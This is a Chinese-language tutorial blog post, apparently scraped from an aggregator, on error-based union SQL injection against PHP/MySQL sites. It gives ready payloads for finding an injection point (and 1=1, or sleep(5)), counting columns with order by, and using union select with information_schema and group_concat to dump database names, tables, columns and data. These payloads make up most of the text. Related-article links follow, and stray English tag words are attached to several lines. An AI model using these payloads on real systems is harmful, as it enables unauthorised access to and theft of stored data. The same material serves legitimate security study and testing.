SQL注入:顯錯注入
SQL注入的本質
就是把用戶輸入的數據當作代碼執行php
注入條件
1.用戶能控制輸入
2.可以將程序本來執行的代碼,拼接上用戶輸入的數據進行執行sql
例: http://www.xxx.com/new.php?id=1 http://www.xxx.com/new.php?id=2-1
注入的基本流程
1.判斷是否存在注入點
1.最古老的方法:
and 1=1 頁面正常
and 1=2 頁面不正常
注:and 1=1 and 1=2 被攔截的可能性過高了
能夠嘗試 and -1=-1 and -1=-2或者直接 or sleep(5)數據庫
2.最簡單的方法:
頁面後面加',看是否報錯服務器
3.經常使用的方法:
若是是數字型傳參,能夠嘗試-1函數
2.猜解字段數
order by 字段數 //顯示報錯則字段數爲前面一個值code
3.聯合查詢找出注入點
and 1=2 union select 1,2,3,…… //能夠將字段都寫上去orm
4.爆庫、表、字段
查用戶權限:union select 1,user(),3
查庫:union select 1,database(),3
查表:union select 1,(select group_concat(table_name) from information_schema.tables where table_schema ='庫名'),3
查字段:union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = '庫名' and table_name = '表名'),3io
5.查詢咱們須要的數據
查數據:union select 1,(select group_concat(字段1,字段2) from 庫名.表名),3table
注入經常使用函數:
group_concat(字段1,字段2) //返回由屬於一組的列值鏈接組合而成的結果
ASCII(char) //返回字符的ASCII碼值
DATABASE() //返回當前數據庫名
USER()或SYSTEM_USER() //返回當前登錄用戶名
VERSION() //返回MySQL服務器的版本
SLEEP(n) //休眠n秒form
- 1. sql注入——顯錯注入
- 2. SQL顯錯注入
- 3. SQL注入----顯錯注入Rank1--4
- 4. 顯錯sql注入練習
- 5. Webug4.0 sql顯錯注入
- 6. 【SQL注入】報錯注入
- 7. SQL注入---報錯注入
- 8. 顯錯注入
- 9. SQL注入--盲注及報錯注入
- 10. SQL回顯注入
- 更多相關文章...
- • SQLite 注入 - SQLite教程
- • Spring DI(依賴注入)的實現方式:屬性注入和構造注入 - Spring教程
- • YAML 入門教程
- • Spring Cloud 微服務實戰(三) - 服務註冊與發現
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. sql注入——顯錯注入
- 2. SQL顯錯注入
- 3. SQL注入----顯錯注入Rank1--4
- 4. 顯錯sql注入練習
- 5. Webug4.0 sql顯錯注入
- 6. 【SQL注入】報錯注入
- 7. SQL注入---報錯注入
- 8. 顯錯注入
- 9. SQL注入--盲注及報錯注入
- 10. SQL回顯注入